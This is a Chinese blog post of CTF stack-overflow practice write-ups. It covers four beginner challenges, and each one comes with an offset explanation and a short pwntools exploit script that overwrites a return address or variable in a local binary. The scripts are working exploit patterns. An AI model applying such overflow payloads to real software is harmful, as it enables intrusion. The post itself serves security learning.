• 栈溢出练习


    0x00 csaw ctf 2016 quals-warmup

    简单的栈溢出问题,保护都没开,新手练习用的

    测试运行了两次,发现给出的地址不是动态的,这样问题就很简单

    需要填充64个字符的padding,再加上8个字符的ebp,一共72个字符

    from pwn import *
    
    p = process('./warmup')
    p.sendline('a'*72 + p64(0x40060d))
    p.interactive()
    

    0x01 EasyCTF 2017-doubly_dangerous

    32位程序,开启了NX保护

    查看伪代码,我的第一念想是使v5等于那个11.28125,但是不知道11.28125的存储方式

    查看11.28125的16进制数

    我们得到00 80 34 41 这个16进制数,但是系统采用的大端,所以真正的值为0x41348000
    在栈上s和v5之间距离是0x40,所以需要64个填充字符

    from pwn import *
    
    p = process('./doubly_dangerous')
    p.sendline('a'*64 + p32(0x41348000))
    p.interactive()
    

    另一个方法是覆盖s的返回地址为give_flag的地址,但是试了很多次都失败了

    0x02 sCTF 2016 q1-pwn1

    32位程序,开启了NX保护

    查看伪代码,s这里限制32个字符,而s距ebp有60个字符;
    然后发现是将输入里的I转化成you。这个时候我们可以想一下,如果我们输入一定的I。在缓冲区大小不变的情况下,转换成you,会不会造成缓冲区溢出,能否覆盖掉返回地址。

    这里最重要的是能看懂c++的这个伪代码,然而我看不懂~~

    from pwn import *
    
    p = process('./pwn1')
    p.sendline('I'*21 + 'a' + p32(0x08048F0D))
    p.interactive()
    

    0x03 Tokyo West CTF 3rd 2017-just_do_it

    32位程序,开启了NX保护

    查看伪代码,strcmp这里存在缓存区溢出

    计算出padding是20个字符

    from pwn import *
    
    p = process('./just_do_it')
    p.sendline('a'*20 + p32(0x0804A080))
    p.interactive()
    
  • 相关阅读:
    solr 的全量更新与增量更新
    solr 服务器的搭建
    Mysql 问题
    App 微信支付
    App 支付宝支付
    Linux 常见命令
    [备注] 钉钉使用教程
    PARAMETER和ARGUMENT的区别
    无界面浏览器
    URLs ...
  • 原文地址:https://www.cnblogs.com/at0de/p/11344371.html
Copyright © 2020-2023  润新知